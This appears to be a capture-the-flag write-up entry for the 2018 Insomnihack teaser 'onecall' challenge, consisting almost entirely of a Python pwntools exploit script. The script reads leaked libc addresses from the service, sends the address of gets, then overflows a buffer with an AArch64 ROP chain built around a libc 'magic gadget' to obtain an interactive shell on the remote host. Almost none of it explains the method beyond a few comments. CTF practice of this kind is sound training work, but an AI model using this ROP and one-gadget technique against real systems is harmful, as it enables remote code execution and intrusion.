Tags: pwn rop libc ropchain gadget magic
Rating: 1.0
https://ntropy-unc.github.io/exploit/pwn/gets/rop/aarch64/arm/magic/gadget/writeup/post/2018/01/21/OneCall.html
```
#!/usr/bin/python
from pwn import *
DEBUG = False
def getpipe():
if DEBUG: #Attach debugger.
return process(['./qemu-aarch64', '-nx', '-L', './', '-g', '12345', './onecall'])
else:
return remote('onecall.teaser.insomnihack.ch',1337)
libc_name = "./lib/libc.so.6"
libc = ELF(libc_name)
gets = libc.symbols['gets']
magic_gadget_offset = 0x3d718
p = getpipe()
output = ""
line = p.recvline()
output += line
while "libc" not in line:
line = p.recvline()
output += line
output += line
output += p.recvuntil(" here ?")
libc_base = int(line.split('-')[0], 16)
#Initialize ROP
p.send(p64(libc_base + gets))
#For GDB
print "Gets returns @", hex(libc_base+0x000604c8)
binsh = libc_base + 0x1179a0
#0x0003d7f0 f353c3a8 ldp x19, x20, [sp], 0x30; ret
#What does this do? I took a guess, and tried it.
loadtox20 = libc_base + 0x3d7f0
#For GDB
print "Loading gadget @", hex(loadtox20)
#last region in /proc/self/maps
#00007f38241b9000
#$sp after blr x1 in same run
#00007f38249b8630
memaddr = int(output.split('\n')[-3].split('-')[0], 16) #Consistent offset of 0x7ff630? Yep.
stkbase = memaddr + 0x7ff630 #Here should be a pointer to the filler in our stack.
saferw = stkbase
#Build rop chain. Don't need precision when you can just spray.
ropchain = flat([
loadtox20-4, #Trying to move x20 to point to stack, load [sp, #16] into x30 for ret
libc_base + magic_gadget_offset,
saferw, #For pivoting x20 somewhere safe, throw it up real high
libc_base+magic_gadget_offset,
saferw, saferw, saferw,
saferw,saferw, saferw, saferw, saferw,saferw, saferw, saferw, saferw
], word_size=64)
payload = "AAAAAAAA"*2 #Filler
payload += ropchain
p.sendline(payload)
p.interactive()
```